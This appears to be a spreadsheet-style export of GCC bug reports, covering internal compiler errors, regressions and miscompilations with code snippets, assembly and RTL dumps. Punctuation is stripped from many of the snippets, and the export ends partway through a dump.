/upstream/build-gcc-tile/gcc/xgcc -B/upstream/build-gcc-tile/gcc/ ./nested-func-4.c -fno-diagnostics-show-caret -fdiagnostics-color=never -pg -I/upstream/release-tile/usr/include -fno-asynchronous-unwind-tables -m64 -mcpu=tilegx -mcmodel=large -mlittle-endian -L /upstream/release-tile/lib -lm -o ./nested-func-4.exe -save-temps -fdump-final-insns=./insns.s
The asm output:
  1         .file   nested-func-4.c
  2         .text
  3         .align 8
  4         .type   bar.1690 @function
  5 bar.1690:
  6         {
  7         move    r10 lr
  8         jal     __mcount
  9         }
 10         st      sp lr
 11         move    r29 r52
 12         move    r52 sp
 13         addi    r28 sp -40
 14         addi    sp sp -48
 15         st      r28 r52
 16         addi    r27 r52 -8
 17         st      r27 r29
 18 
 19         move    r12 r10
 20         addi    r11 r52 -24
 21         st      r11 r10
 22         ld4s    r10 r12
 23         xori    r10 r10 2 bfextu     r10 r10 0 31 cmpeqi r10 r10 0
 24         bnez    r10 .L3
 25         moveli  r10 hw2_last(abort)
 26         shl16insli      r10 r10 hw1(abort)
 27         shl16insli      r10 r10 hw0(abort)
 28         jalr    r10
 29 .L3:
 30         nop
 31         ld      lr r52
 32         addi    r28 r52 -8
 33         ld      r29 r28
 34 
 35         move    sp r52
 36         move    r52 r29
 37         jrp     lr
 38         .size   bar.1690 .-bar.1690
 39         .align 8
 40 .global foo
 41         .type   foo @function
 42 foo:
 43         {
 44         move    r10 lr
 45         jal     __mcount
 46         }
 47         st      sp lr
 48         move    r29 r52
 49         move    r52 sp
 50         addi    r28 sp -56
 51         addi    sp sp -64
 52         st      r28 r52
 53         addi    r27 r52 -8
 54         st      r27 r29
 55 
 56         move    r10 r0
 57         addxi   r11 r10 0
 58         addi    r10 r52 -36
 59         st4     r10 r11
 60         move    r11 r52
 61         addi    r10 r52 -32
 62         addi    r10 r10 8
 63         st      r10 r11
 64         addi    r10 r52 -32
 65         addi    r11 r52 -36
 66         ld4s    r11 r11
 67         st4     r10 r11
 68         addi    r10 r52 -32
 69         moveli  r11 hw2_last(bar.1690)
 70         shl16insli      r11 r11 hw1(bar.1690)
 71         shl16insli      r11 r11 hw0(bar.1690)
 72         jalr    r11
 73         nop
 74         ld      lr r52
 75         addi    r28 r52 -8
 76         ld      r29 r28
 77 
 78         move    sp r52
 79         move    r52 r29
 80         jrp     lr
 81         .size   foo .-foo
 82         .align 8
 83 .global main
 84         .type   main @function
 85 main:
 86         {
 87         move    r10 lr
 88         jal     __mcount
 89         }
 90         st      sp lr
 91         move    r29 r52
 92         move    r52 sp
 93         addi    r28 sp -24
 94         addi    sp sp -32
 95         st      r28 r52
 96         addi    r27 r52 -8
 97         st      r27 r29
 98 
 99         movei   r0 2
100         moveli  r10 hw2_last(foo)
101         shl16insli      r10 r10 hw1(foo)
102         shl16insli      r10 r10 hw0(foo)
103         jalr    r10
104         movei   r10 0
105         move    r0 r10
106         ld      lr r52
107         addi    r28 r52 -8
108         ld      r29 r28
109 
110         move    sp r52
111         move    r52 r29
112         jrp     lr
113         .size   main .-main
114         .ident  GCC: (GNU) 7.0.0 20160529 (experimental)
115         .section        .note.GNU-stack@progbits</t>
  </si>
  <si>
    <t>gang.chen.5i5j</t>
  </si>
  <si>
    <t>GCC-15718</t>
  </si>
  <si>
    <t>[3.3 regression][alpha] ICE in subreg_hard_regno at emit-rtl.c:928</t>
  </si>
  <si>
    <t>I noticed regression failures on this platform that I hadn't seen before.
See
http://gcc.gnu.org/ml/gcc-testresults/2004-05/msg01284.html
and check the failing g77 tests.  Gcc 3.3.3 had no g77 failures at all.
The new Fortran failures are all ICE's of the form
90826-2.f:25: internal compiler error: in subreg_hard_regno at emit-rtl.c:928</t>
  </si>
  <si>
    <t>GCC-50740</t>
  </si>
  <si>
    <t>CPUID leaf 7 for BMI/BMI2/AVX2 feature detection not qualified with max_level and doesn't use subleaf</t>
  </si>
  <si>
    <t xml:space="preserve">The cpuid code for detecting BMI BMI2 and AVX2 support needs to be qualified with max_level &gt;= 7. Additionally it should use __cpuid_count instead of __cpuid because leaf 7 uses subleafs just like leaf 4.
Relevant code from i386-driver.c
      __cpuid (0x7 eax ebx ecx edx)
      has_bmi = ebx 
      has_avx2 = ebx 
      has_bmi2 = ebx </t>
  </si>
  <si>
    <t>craig.topper</t>
  </si>
  <si>
    <t>GCC-20411</t>
  </si>
  <si>
    <t>Templated functions are not found pure/const</t>
  </si>
  <si>
    <t>I believe this is a known problem but I couldn't find it anywhere.
The inliner at -O2 will attempt to inline any small functions. It will not
however try to inline functions will external linkage which includes all
templated functions.
As much C++ code (including libstdc++) contains many small templated functions
this means it is necessary to mark all these functions as inline to ensure they
are even considered at -O2.
Example: given:
void foo() {}
void foo2() {foo()}
int main() {foo2()}
then main() is optimised away to an empty function at -O2. However:
template
void foo() {}
template
void foo2() {foo()}
int main() {foo2()}
leaves the calls to foo2 and foo in at -O2.
Is there a good reason to not pull inlining of small functions (which in C++
typically consist of simply calling a new function with almost identical
parameters) into -O2 even when they have external linkage? (or make an
exception for templated functions?)</t>
  </si>
  <si>
    <t>GCC-83149</t>
  </si>
  <si>
    <t>[6- and 7-branches] Missing test for sym-&gt;ns-&gt;proc_name: crash_signal in toplev.c:325</t>
  </si>
  <si>
    <t>The current 8.0 trunk gives an ICE on the following example but only when then the program units are in two separate files. Works fine with 7.2.1 and 6.4.1.
module mod
  character(8) string
contains
  function get_string() result(s)
    character(len_trim(string)) s
    s = string
  end function
end module
use mod
string = 'fubar'
select case (get_string())
case default
end select
end
Here's the traceback:
$ gfortran gfortran-20171124e.f90 gfortran-20171124e-main.f90 
gfortran-20171124e-main.f90:3:0:
 select case (get_string())
internal compiler error: Segmentation fault
0xd6b98f crash_signal
	../../gcc/toplev.c:325
0x96852e gfc_sym_type(gfc_symbol*)
	../../gcc/fortran/trans-types.c:2207
0x968ab7 gfc_get_function_type(gfc_symbol*)
	../../gcc/fortran/trans-types.c:2969
0x907aed gfc_get_extern_function_decl(gfc_symbol*)
	../../gcc/fortran/trans-decl.c:2126
0x907ffd gfc_get_extern_function_decl(gfc_symbol*)
	../../gcc/fortran/trans-decl.c:1974
0x91bb24 conv_function_val
	../../gcc/fortran/trans-expr.c:3722
0x91bb24 gfc_conv_procedure_call(gfc_se* gfc_symbol* gfc_actual_arglist* gfc_expr* vec*)
	../../gcc/fortran/trans-expr.c:6142
0x91c6fa gfc_conv_expr(gfc_se* gfc_expr*)
	../../gcc/fortran/trans-expr.c:7852
0x923a6a gfc_conv_expr_reference(gfc_se* gfc_expr*)
	../../gcc/fortran/trans-expr.c:7952
0x957611 gfc_trans_character_select
	../../gcc/fortran/trans-stmt.c:2819
0x95ee1c gfc_trans_select(gfc_code*)
	../../gcc/fortran/trans-stmt.c:3158
0x8e48b7 trans_code
	../../gcc/fortran/trans.c:1940
0x90e7a8 gfc_generate_function_code(gfc_namespace*)
	../../gcc/fortran/trans-decl.c:6437
0x89d036 translate_all_program_units
	../../gcc/fortran/parse.c:6091
0x89d036 gfc_parse_file()
	../../gcc/fortran/parse.c:6294
0x8e0eaf gfc_be_parse_file
	../../gcc/fortran/f95-lang.c:204</t>
  </si>
  <si>
    <t>GCC-27266</t>
  </si>
  <si>
    <t>[4.2 Regression] syncronization primitives cause ICE with -march=pentium or better</t>
  </si>
  <si>
    <t>Mainline is ICE'ing on testsuite/gcc.c-torture/compile/sync-1.c for some arguments to -march. For example:
./xgcc -B. -O2 /mnt/sysfs/rask/cvssrc/gcc/gcc/testsuite/gcc.c-torture/compile/sync-1.c -S -o /tmp/sync-1.s -march=pentium
/mnt/sysfs/rask/cvssrc/gcc/gcc/testsuite/gcc.c-torture/compile/sync-1.c: In function 'test_lock':
/mnt/sysfs/rask/cvssrc/gcc/gcc/testsuite/gcc.c-torture/compile/sync-1.c:261: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It works with: i386 i486 winchip-c6 winchip2 and c3.
It fails with: pentium pentium-mmx pentiumpro pentium2 pentium3 pentium4 nocona prescott k6 k6-2 k6-3 k8 athlon opteron and c3-2.
The gcc-4.1.0-3 compiler shipped by Red Hat fails in the same way for the same arguments to -march.</t>
  </si>
  <si>
    <t>GCC-8271</t>
  </si>
  <si>
    <t>Templates and pointers to const member functions</t>
  </si>
  <si>
    <t>The following code compiles with gcc:
-------------------------------------------
struct X { void f () const }
template  void g(void (T::*) ())
void h () {  g (  }
-------------------------------------------
On the other hand it fails to compile with at least two 
other compilers which made me wonder who's right and who
is wrong. The point is that the template function g takes
a member function pointer but we pass a pointer to a
_const_ member function. gcc does what seems very
reasonablenamely identifying the template argument T with
const X. However other compilers do not do this. They
say there is no prototype for an argument 
'void (T::*)() const'.
I tried to find normative statements in the standard but
could not find anything that would match my case which is
probably only due to an incomplete search through the
standard.
So I would be happy about a statement by someone more
knowledgeable about this than me :-)
Thanks
  Wolfgang
Release:
unknown
Environment:
all gcc versions since at least 2.95</t>
  </si>
  <si>
    <t>GCC-12337</t>
  </si>
  <si>
    <t>[3.3 regression] infinite loop in g++</t>
  </si>
  <si>
    <t>When compiling the following code g++ goes into an infinite loop. 
--- start of loop.cpp ------------------
class A {}
template 
class X : public A {
public:
  X(T
}
class B {
public:
  bool foo(A*)
  template 
  bool foo(T }
}
int main()
{
  B x y
  x.foo(y)
}
--- end of loop.cpp ----------------
$ g++ -c loop.cpp
[never finishes]
Compiler version is:
$ g++ -v
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--disable-checking --with-system-zlib --enable-__cxa_atexit --host=i386-redhat-linux
Thread model: posix
gcc version 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
Also verified the same behavior with g++ 3.3.1 compiled with the same configure
options.</t>
  </si>
  <si>
    <t>matias</t>
  </si>
  <si>
    <t>GCC-5006</t>
  </si>
  <si>
    <t>Multiple temporary objects created on stack in the same location.</t>
  </si>
  <si>
    <t>When compiling with -O the compiler creates a temporary object of type auto_ptr on the stack.  It then overwrites this with a temporary of type A before calling the destructor on the original auto_ptr.  This tries to call ::operator delete() on what it thinks is the heap-allocated pointer owned by the auto_ptr but is actually a string literal owned by A.  Depending on the exact memory layout a segv sometimes results.
Release:
3.0.2 (and 3.0.1)
Environment:
i686-pc-linux-gnu
How-To-Repeat:
Build with -O to duplicate the bug.  A run-time segv (usually) results.</t>
  </si>
  <si>
    <t>GCC-49408</t>
  </si>
  <si>
    <t>member function template id not matching linkage name</t>
  </si>
  <si>
    <t>FAIL gcc (GCC) 4.4.7 20110614 (prerelease)
FAIL gcc (GCC) 4.7.0 20110614 (experimental)
struct S {
  void m (int x) {}
}
template
struct K {
  void f () { S s (s.*F) (5) }
}
int main () {
  K&lt;
  k.f ()
}
-g
 : Abbrev Number: 8 (DW_TAG_structure_type)
       DW_AT_name        : K        
 : Abbrev Number: 10 (DW_TAG_template_value_param)
       DW_AT_name        : F        
       DW_AT_type        :   
 : Abbrev Number: 9 (DW_TAG_subprogram)
       DW_AT_name        : f        
       DW_AT_MIPS_linkage_name: _ZN1KIXadL_ZN1S1mEiEEE1fEv  
 : Abbrev Number: 18 (DW_TAG_subprogram)
       DW_AT_specification:  
       DW_AT_low_pc      : 0x4004de        
00000000004004de W _ZN1KIXadL_ZN1S1mEiEEE1fEv
00000000004004de W K::f()
The linkage name has class name: K
But DW_AT_name of that class is: K
It is not ambiguous but it breaks debugger lookups.</t>
  </si>
  <si>
    <t>GCC-4804</t>
  </si>
  <si>
    <t>jar not found</t>
  </si>
  <si>
    <t>Compiling gcc results:
...
find java gnu javax org -type d -o -type f -name '*.class' | \
  sed -e '/\/\./d' -e '/\/xlib/d' | \
  ../../fastjar/jar cfM0E@ libgcj.jar
/bin/sh: ../../fastjar/jar: No such file or directory
make[1]: *** [libgcj.jar] Error 127
...
Release:
latest cvs
Environment:
i686-pc-linux-gnu
How-To-Repeat:
just compile</t>
  </si>
  <si>
    <t>georg.wild</t>
  </si>
  <si>
    <t>GCC-64452</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] ICE in avr-gcc when passing struct member to varargs function</t>
  </si>
  <si>
    <t>Created attachment 34366
Reduced test case
Compiling the attached test case with gcc 4.8.2 (ubuntu 14.04.1 LTS) produces
$ avr-gcc -c avr-gcc-ice.c 
avr-gcc-ice.c: In function â€˜fooâ€™:
avr-gcc-ice.c:12:1: internal compiler error: in push_reload at reload.c:1360
 }
 ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The ICE seems to be triggered by the specific combination of:
* struct layout (switching field order in A avoids the error)
* passing the structs by value (passing pointers to A avoids the error)
* passing to a varargs function (replacing the call to printf with a
  non-varargs function which accepts the same args avoids the error)</t>
  </si>
  <si>
    <t>chris.foster</t>
  </si>
  <si>
    <t>GCC-9686</t>
  </si>
  <si>
    <t>gcc 3.2 compile Generative Matrix Page fail</t>
  </si>
  <si>
    <t>when run g++ -v demomain.cpp I get 
Reading specs from /usr/lib/gcc-lib/i686-pc-cygwin/3.2/specs
Configured with: /netrel/src/gcc-3.2-3/configure --enable-languages=cc++f77java --enable-libgcj --enable-threads=posix --with-system-zlib --enable-nls --without-included-gettext --enable-interpreter --disable-sjlj-exceptions --disable-version-specific-runtime-libs --enable-shared --build=i686-pc-linux --host=i686-pc-cygwin --target=i686-pc-cygwin --enable-haifa --prefix=/usr --exec-prefix=/usr --sysconfdir=/etc --libdir=/usr/lib --includedir=/nonexistent/include --libexecdir=/usr/sbin
Thread model: posix
gcc version 3.2 20020927 (prerelease)
 /usr/lib/gcc-lib/i686-pc-cygwin/3.2/cc1plus.exe -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -D_X86_=1 -D_X86_=1 -Asystem=winnt -D__NO_INLINE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ -D__tune_pentium2__ -D__tune_pentium3__ -D__stdcall=__attribute__((__stdcall__)) -D__fastcall=__attribute__((__fastcall__)) -D__cdecl=__attribute__((__cdecl__)) -D_stdcall=__attribute__((__stdcall__)) -D_fastcall=__attribute__((__fastcall__)) -D_cdecl=__attribute__((__cdecl__)) -D__declspec(x)=__attribute__((x)) -D__i386__ -D__i386 -D__CYGWIN32__ -D__CYGWIN__ -Dunix -D__unix__ -D__unix -isystem /usr/lib/gcc-lib/i686-pc-cygwin/3.2/../../../../include/w32api -isystem /usr/lib/gcc-lib/i686-pc-cygwin/3.2/../../../../i686-pc-cygwin/lib/../../include/w32api demomain.cpp -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -quiet -dumpbase demomain.cpp -version -o /cygdrive/c/DOCUME~1/DENGHA~1/LOCALS~1/Temp/ccn0aNjQ.s
GNU CPP version 3.2 20020927 (prerelease) (cpplib) (80386 BSD syntax)
GNU C++ version 3.2 20020927 (prerelease) (i686-pc-cygwin)
	compiled by GNU C version 3.2 20020927 (prerelease).
ignoring nonexistent directory /usr/local/include
ignoring nonexistent directory /usr/i686-pc-cygwin/include
ignoring duplicate directory /usr/i686-pc-cygwin/lib/../../include/w32api
#include ... search starts here:
#include  search starts here:
 /usr/include/w32api
 /usr/include/c++/3.2
 /usr/include/c++/3.2/i686-pc-cygwin
 /usr/include/c++/3.2/backward
 /usr/lib/gcc-lib/i686-pc-cygwin/3.2/include
 /usr/include
End of search list.
In file included from GenerativeMatrix.h:59
                 from demomain.cpp:31:
DSLAssignDefaults.h:159: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Release:
3.2
Environment:
cygwin run on P4 2Gwin2000 professional
How-To-Repeat:
unzip the source run g++ demomain.cpp under cygwin</t>
  </si>
  <si>
    <t>denghao</t>
  </si>
  <si>
    <t>GCC-24460</t>
  </si>
  <si>
    <t>[4.1 regression] Profiled bootstrap broken</t>
  </si>
  <si>
    <t>The failure message is:
stage1/xgcc -Bstage1/ -B/opt/build/eric/local/gcc/sparc-sun-solaris2.10/bin/ -c  -g -O2 -fprofile-use -freorder-blocks-and-partition -DIN_GCC   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-prototypes -pedantic -Wno-long-long -Wno-variadic-macros -Wold-style-definition -Wmissing-format-attribute -Werror -fno-common   -DHAVE_CONFIG_H -I. -I. -I/home/eric/cvs/gcc/gcc -I/home/eric/cvs/gcc/gcc/. -I/home/eric/cvs/gcc/gcc/../include -I./../intl -I/home/eric/cvs/gcc/gcc/../libcpp/include -I/opt/build/eric/local/include -I/opt/build/eric/local/include   /home/eric/cvs/gcc/gcc/attribs.c -o attribs.o
/home/eric/cvs/gcc/gcc/attribs.c:332: internal compiler error: Segmentation Fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[2]: *** [attribs.o] Error 1
gmake[2]: Leaving directory `/opt/build/eric/gcc/gcc'
gmake[1]: *** [stagefeedback_build] Error 2
gmake[1]: Leaving directory `/opt/build/eric/gcc/gcc'
gmake: *** [profiledbootstrap] Error 2
A bit annoying to debug as the stage1 compiler is apparently built without debug info.  The bug happens with -g -fprofile-use -freorder-blocks-and-partition.</t>
  </si>
  <si>
    <t>GCC-15641</t>
  </si>
  <si>
    <t>multiple equivalences do not work</t>
  </si>
  <si>
    <t>$ cat g.f
      COMMON ICOE01 RCOE01
      EQUIVALENCE (ICOE01ICOE02ICOE03ICOE04) (RCOE01RCOE02RCOE03)
      RCOE01 = 1
      RCOE02 = 2
      RCOE03 = 3
      ICOE01 = 1
      ICOE02 = 2
      ICOE03 = 3
      ICOE04 = 4
      PRINT*RCOE01RCOE02RCOE03
      PRINT*ICOE01ICOE02ICOE03ICOE04
      END
$ gfortran g.f
$ ./a.out
   1.000000       2.000000       3.000000
           1           2           3           4
$ g77 g.f
$ ./a.out
  3.  3.  3.
 4 4 4 4
$ gfortran --version
GNU Fortran 95 (GCC 3.5.0 20040524 (experimental))
from FM023.FOR of NIST F77 validation suite.</t>
  </si>
  <si>
    <t>GCC-32769</t>
  </si>
  <si>
    <t>[4.3 Regression] __builtin_eh_return broken by dataflow merge</t>
  </si>
  <si>
    <t>All EH related tests fail on all hppa targets using dwarf2 EH support.
See for example: .
I looked at the failure of gcc.dg/cleanup-8.c.  The following code appears to
be miscompiled:
#define uw_install_context(CURRENT TARGET)                              \
  do                                                                     \
    {                                                                    \
      long offset = uw_install_context_1 ((CURRENT) (TARGET))          \
      void *handler = __builtin_frob_return_addr ((TARGET)-&gt;ra)         \
      __builtin_eh_return (offset handler)                             \
    }                                                                    \
  while (0)
Prior to the dataflow merge we have the following assembler code:
0x00013308 :  bl 0x113bc rp
0x0001330c :  copy r3r25
0x00013310 :  copy ret0ret1
0x00013314 :  ldw -164(sp)ret0
0x00013318 :  bl 0x13278 r0
0x0001331c :  stw ret0-4d4(sp)
The last instruction stores the new address for the return pointer into the
frame.  The epilogue at _Unwind_ForcedUnwind+240 loads the return pointer
from this location.
After the dataflow merge we have the following:
0x000137f4 :  bl 0x10e34 rp
0x000137f8 :  copy r3r25
0x000137fc :  bl 0x13764 r0
0x00013800 :  copy ret0ret1
The new return pointer isn't saved in the frame so _Unwind_ForcedUnwind
returns to the wrong place.  It looks like the insns are dropped the dse1
pass.
We have the following after the cse2 pass:
 Start of basic block ( 2) -&gt; 4
 bb 4 artificial_defs: { }
 bb 4 artificial_uses: { u54(3){ }u55(19){ }u56(30){ }}
 lr  in        3 [%r3] 19 [%r19] 30 [%r30] 104 113
 lr  use       3 [%r3] 19 [%r19] 30 [%r30] 104 113
 lr  def       0 [%r0] 1 [%r1] 2 [%r2] 4 [%r4] 19 [%r19] 20 [%r20] 21 [%r21] 2
2 [%r22] 23 [%r23] 24 [%r24] 25 [%r25] 26 [%r26] 27 [%r27] 28 [%r28] 29 [%r29] 3
1 [%r31] 32 [%fr4] 33 [%fr4R] 34 [%fr5] 35 [%fr5R] 36 [%fr6] 37 [%fr6R] 38 [%fr7
] 39 [%fr7R] 40 [%fr8] 41 [%fr8R] 42 [%fr9] 43 [%fr9R] 44 [%fr10] 45 [%fr10R] 46
 [%fr11] 47 [%fr11R] 68 [%fr22] 69 [%fr22R] 70 [%fr23] 71 [%fr23R] 72 [%fr24] 73 [%fr24R] 74 [%fr25] 75 [%fr25R] 76 [%fr26] 77 [%fr26R] 78 [%fr27] 79 [%fr27R] 80 [%fr28] 81 [%fr28R] 82 [%fr29] 83 [%fr29R] 84 [%fr30] 85 [%fr30R] 86 [%fr31] 87 [%fr31R] 88 [SAR] 94 95 99
 live  in      3 [%r3] 19 [%r19] 30 [%r30] 104 113
 live  gen     25 [%r25] 26 [%r26] 28 [%r28] 29 [%r29] 94 95
 live  kill    1 [%r1] 2 [%r2] 4 [%r4] 28 [%r28] 99
 Pred edge  2 [1.0%]
(code_label 34 47 35 4 546  [1 uses])
(note 35 34 37 4 [bb 4] NOTE_INSN_BASIC_BLOCK)
(insn 37 35 38 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (set (reg:SI 26 %r26)
        (reg/f:SI 113)) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg/f:SI 113)
        (expr_list:REG_EQUAL (plus:SI (reg/f:SI 3 %r3)
                (const_int 8 [0x8]))
            (nil))))
(insn 38 37 39 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (set (reg:SI 25 %r25)
        (reg/f:SI 104)) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg/f:SI 104)
        (expr_list:REG_EQUAL (plus:SI (reg/f:SI 3 %r3)
                (const_int 496 [0x1f0]))
            (nil))))
(call_insn 39 38 40 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (parallel [
            (set (reg:SI 28 %r28)
                (call (mem:SI (symbol_ref/v:SI (@uw_install_context_1) [flags 0x203] ) [0 S4 A32])
                    (const_int 16 [0x10])))
            (clobber (reg:SI 1 %r1))
            (clobber (reg:SI 2 %r2))
            (clobber (reg:SI 4 %r4))
            (use (reg:SI 19 %r19))
            (use (const_int 0 [0x0]))
        ]) 216 {call_val_symref_pic} (expr_list:REG_DEAD (reg:SI 26 %r26)
        (expr_list:REG_DEAD (reg:SI 25 %r25)
            (nil)))
    (expr_list:REG_DEP_TRUE (use (reg:SI 25 %r25))
        (expr_list:REG_DEP_TRUE (use (reg:SI 26 %r26))
            (nil))))
(insn 40 39 41 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (set (reg/v:SI 95 [ offset ])
        (reg:SI 28 %r28)) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg:SI 28 %r28)
        (nil)))
(insn 41 40 51 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (set (reg/v/f:SI 94 [ handler ])
        (mem/s/f/c:SI (plus:SI (reg/f:SI 3 %r3)
                (const_int 860 [0x35c])) [4 cur_context.ra+0 S4 A32])) 37 {*pa.md:2543} (nil))
(insn 51 41 52 4 ../../../gcc/libgcc/../gcc/unwind.inc:216 (clobber (reg/i:SI 28 %r28 [  ])) -1 (expr_list:REG_UNUSED (reg/i:SI 28 %r28 [  ])
        (nil)))
(insn 52 51 53 4 ../../../gcc/libgcc/../gcc/unwind.inc:216 (clobber (reg:SI 99 [  ])) -1 (expr_list:REG_UNUSED (reg:SI 99 [  ])
        (nil)))
(insn 53 52 54 4 ../../../gcc/libgcc/../gcc/unwind.inc:216 (set (reg:SI 29 %r29 [ offset ])
        (reg/v:SI 95 [ offset ])) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg/v:SI 95 [ offset ])
        (nil)))
(insn 54 53 55 4 ../../../gcc/libgcc/../gcc/unwind.inc:216 (set (mem:SI (plus:SI (reg/f:SI 3 %r3)
                (const_int -20 [0xffffffec])) [0 S4 A32])
        (reg/v/f:SI 94 [ handler ])) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg/v/f:SI 94 [ handler ])
        (nil)))
 End of basic block 4 -&gt; ( 5)
 lr  out       3 [%r3] 19 [%r19] 29 [%r29] 30 [%r30] 99
 live  out     3 [%r3] 19 [%r19] 29 [%r29] 30 [%r30]
 Succ edge  5 [100.0%]  (fallthru)
 Start of basic block ( 3 4) -&gt; 5
 bb 5 artificial_defs: { }
 bb 5 artificial_uses: { u76(3){ }u77(19){ }u78(30){ }}
 lr  in        3 [%r3] 19 [%r19] 29 [%r29] 30 [%r30] 99
 lr  use       3 [%r3] 19 [%r19] 30 [%r30] 99
 lr  def       28 [%r28]
 live  in      3 [%r3] 19 [%r19] 29 [%r29] 30 [%r30] 99
 live  gen     28 [%r28]
 live  kill
 Pred edge  3 [100.0%]  (fallthru)
 Pred edge  4 [100.0%]  (fallthru)
(code_label 55 54 66 5 548  [0 uses])
(note 66 55 56 5 [bb 5] NOTE_INSN_BASIC_BLOCK)
(insn 56 66 62 5 ../../../gcc/libgcc/../gcc/unwind.inc:216 (set (reg/i:SI 28 %r28 [  ])
        (reg:SI 99 [  ])) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg:SI 99 [  ])
        (nil)))
(insn 62 56 0 5 ../../../gcc/libgcc/../gcc/unwind.inc:216 (use (reg/i:SI 28 %r28 [  ])) -1 (nil))
 End of basic block 5 -&gt; ( 1)
 lr  out       3 [%r3] 19 [%r19] 28 [%r28] 29 [%r29] 30 [%r30]
 live  out     3 [%r3] 19 [%r19] 28 [%r28] 29 [%r29] 30 [%r30]
 Succ edge  EXIT [100.0%]  (fallthru)
We have the following after the dse1 pass:
...
**scanning insn=41
  mem: (plus:SI (reg/f:SI 3 %r3)
    (const_int 860 [0x35c]))
   after cselib_expand address: (plus:SI (reg/f:SI 3 %r3)
    (const_int 860 [0x35c]))
   after canon_rtx address: (plus:SI (reg/f:SI 3 %r3)
    (const_int 860 [0x35c]))
  gid=4 offset=860
 processing const load gid=4[860..864)
mems_found = 0 cannot_delete = true
...
**scanning insn=54
  mem: (plus:SI (reg/f:SI 3 %r3)
    (const_int -20 [0xffffffec]))
   after cselib_expand address: (plus:SI (reg/f:SI 3 %r3)
    (const_int -20 [0xffffffec]))
   after canon_rtx address: (plus:SI (reg/f:SI 3 %r3)
    (const_int -20 [0xffffffec]))
  gid=4 offset=-20
 processing const base store gid=4[-20..-16)
mems_found = 1 cannot_delete = false
...
starting to process insn 54
  v:  1 2 3 4
i = -20 index = 4
i = -19 index = 3
i = -18 index = 2
i = -17 index = 1
deferring deletion of insn with uid = 54.
...
starting to process insn 41
  v:  1 2 3 4
regular read
...
 Start of basic block ( 2) -&gt; 4
 bb 4 artificial_defs: { }
 bb 4 artificial_uses: { u54(3){ }u55(19){ }u56(30){ }}
 lr  in        3 [%r3] 19 [%r19] 30 [%r30] 104 113
 lr  use       3 [%r3] 19 [%r19] 30 [%r30] 104 113
 lr  def       0 [%r0] 1 [%r1] 2 [%r2] 4 [%r4] 19 [%r19] 20 [%r20] 21 [%r21] 2
2 [%r22] 23 [%r23] 24 [%r24] 25 [%r25] 26 [%r26] 27 [%r27] 28 [%r28] 29 [%r29] 3
1 [%r31] 32 [%fr4] 33 [%fr4R] 34 [%fr5] 35 [%fr5R] 36 [%fr6] 37 [%fr6R] 38 [%fr7
] 39 [%fr7R] 40 [%fr8] 41 [%fr8R] 42 [%fr9] 43 [%fr9R] 44 [%fr10] 45 [%fr10R] 46
 [%fr11] 47 [%fr11R] 68 [%fr22] 69 [%fr22R] 70 [%fr23] 71 [%fr23R] 72 [%fr24] 73
 [%fr24R] 74 [%fr25] 75 [%fr25R] 76 [%fr26] 77 [%fr26R] 78 [%fr27] 79 [%fr27R] 8
0 [%fr28] 81 [%fr28R] 82 [%fr29] 83 [%fr29R] 84 [%fr30] 85 [%fr30R] 86 [%fr31] 8
7 [%fr31R] 88 [SAR] 94 95 99
 live  in      3 [%r3] 19 [%r19] 30 [%r30] 104 113
 live  gen     25 [%r25] 26 [%r26] 28 [%r28] 29 [%r29] 94 95
 live  kill    1 [%r1] 2 [%r2] 4 [%r4] 28 [%r28] 99
 Pred edge  2 [1.0%]
(code_label 34 47 35 4 546  [1 uses])
(note 35 34 37 4 [bb 4] NOTE_INSN_BASIC_BLOCK)
(insn 37 35 38 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (set (reg:SI 26 %r26)
        (reg/f:SI 113)) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg/f:SI 113)
        (expr_list:REG_EQUAL (plus:SI (reg/f:SI 3 %r3)
                (const_int 8 [0x8]))
            (nil))))
(insn 38 37 39 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (set (reg:SI 25 %r25)
        (reg/f:SI 104)) 37 {*pa.md:2543} (expr_list:REG_DEAD (reg/f:SI 104)
        (expr_list:REG_EQUAL (plus:SI (reg/f:SI 3 %r3)
                (const_int 496 [0x1f0]))
            (nil))))
(call_insn 39 38 40 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (parallel [
            (set (reg:SI 28 %r28)
                (call (mem:SI (symbol_ref/v:SI (@uw_install_context_1) [flags 0x203] ) [0 S4 A32])
                    (const_int 16 [0x10])))
            (clobber (reg:SI 1 %r1))
            (clobber (reg:SI 2 %r2))
            (clobber (reg:SI 4 %r4))
            (use (reg:SI 19 %r19))
            (use (const_int 0 [0x0]))
        ]) 216 {call_val_symref_pic} (expr_list:REG_DEAD (reg:SI 26 %r26)
        (expr_list:REG_DEAD (reg:SI 25 %r25)
            (nil)))
    (expr_list:REG_DEP_TRUE (use (reg:SI 25 %r25))
        (expr_list:REG_DEP_TRUE (use (reg:SI 26 %r26))
            (nil))))
(insn 40 39 41 4 ../../../gcc/libgcc/../gcc/unwind.inc:215 (set (reg/v:SI 95 [ offset ])
